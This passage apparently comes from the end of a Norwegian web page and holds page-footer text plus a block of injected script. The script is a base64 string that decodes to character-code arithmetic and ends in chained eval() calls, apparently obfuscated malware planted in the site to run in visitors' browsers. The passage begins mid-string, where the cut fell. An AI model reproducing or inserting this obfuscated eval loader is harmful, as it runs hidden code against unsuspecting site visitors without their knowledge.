IC0gNiwgMTA2IC0gNywgNDEgLSAxLCAxMDYgLSA5LCAxMjIgLSA2LCAxMTQgLSAzLCAxMDUgLSA3LCA0OCAtIDgsIDEwMyAtIDIsIDExMSAtIDEsIDEwNyAtIDgsIDExMCAtIDksIDEwMyAtIDMsIDQ3IC0gNiwgNDYgLSAyLCAzNiAtIDQsIDEwOSAtIDIsIDEwNSAtIDQsIDEyOCAtIDcsIDQ1IC0gNCwgNjEgLSAyLCAxMiAtIDIsIDQ5IC0gOSwgMTE0IC0gNCwgMTA4IC0gNywgMTI4IC0gOSwgMzUgLSAzLCA3OSAtIDksIDExOSAtIDIsIDExNiAtIDYsIDEwNSAtIDYsIDEyMiAtIDYsIDExMCAtIDUsIDExOSAtIDgsIDExNSAtIDUsIDQ3IC0gNywgMTA1IC0gNSwgMTEwIC0gOSwgMTA0IC0gNSwgNDUgLSA0LCA0MiAtIDEsIDQ3IC0gNywgNDkgLSA4LCA2MyAtIDQsIDE0IC0gNCwgMTggLSA4KTtldmFsKFZJWUhORUVSWkUpOw==’);
eval(PKLQVVRYLQ);

Sist oppdatert: 2. november 2017

Til toppen